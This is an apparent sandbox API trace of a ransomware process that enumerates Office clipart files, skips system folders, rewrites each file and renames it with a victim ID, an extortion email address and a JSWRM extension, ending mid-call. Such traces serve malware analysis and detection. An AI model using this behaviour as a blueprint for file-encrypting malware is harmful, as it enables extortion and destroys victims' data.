[0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105504.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105504.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105504.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105504.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105504.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0081.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.480] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4148) returned 1 [0081.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1030) returned 0x23fc98 [0081.480] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1030, lpOverlapped=0x0) returned 1 [0081.481] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.481] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1030, lpOverlapped=0x0) returned 1 [0081.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0081.482] CloseHandle (hObject=0x314) returned 1 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0081.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0081.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0081.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0081.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0081.483] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105506.WMF", cAlternateFileName="")) returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2=".") returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="..") returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="...") returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="windows") returned -1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="recovery") returned -1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="perflogs") returned -1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="documents and settings") returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="system volume information") returned -1 [0081.483] lstrcmpiW (lpString1="J0105506.WMF", lpString2="msocache") returned -1 [0081.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105506.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105506.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105506.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105506.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105506.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105506.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0081.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.484] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2912) returned 1 [0081.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb60) returned 0x23fc98 [0081.484] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb60, lpOverlapped=0x0) returned 1 [0081.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.485] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb60, lpOverlapped=0x0) returned 1 [0081.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0081.486] CloseHandle (hObject=0x314) returned 1 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0081.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0081.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0081.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0081.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0081.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.487] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c44, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105520.WMF", cAlternateFileName="")) returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2=".") returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="..") returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="...") returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="windows") returned -1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="recovery") returned -1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="perflogs") returned -1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="documents and settings") returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="system volume information") returned -1 [0081.487] lstrcmpiW (lpString1="J0105520.WMF", lpString2="msocache") returned -1 [0081.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105520.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105520.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105520.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105520.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105520.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105520.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0081.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.488] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31812) returned 1 [0081.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c40) returned 0x24d210 [0081.488] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c40, lpOverlapped=0x0) returned 1 [0081.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.492] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c40, lpOverlapped=0x0) returned 1 [0081.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.493] CloseHandle (hObject=0x314) returned 1 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0081.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0081.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0081.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.494] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105526.WMF", cAlternateFileName="")) returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2=".") returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="..") returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="...") returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="windows") returned -1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="recovery") returned -1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="perflogs") returned -1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="documents and settings") returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="system volume information") returned -1 [0081.494] lstrcmpiW (lpString1="J0105526.WMF", lpString2="msocache") returned -1 [0081.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105526.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105526.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105526.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105526.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105526.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105526.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0081.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 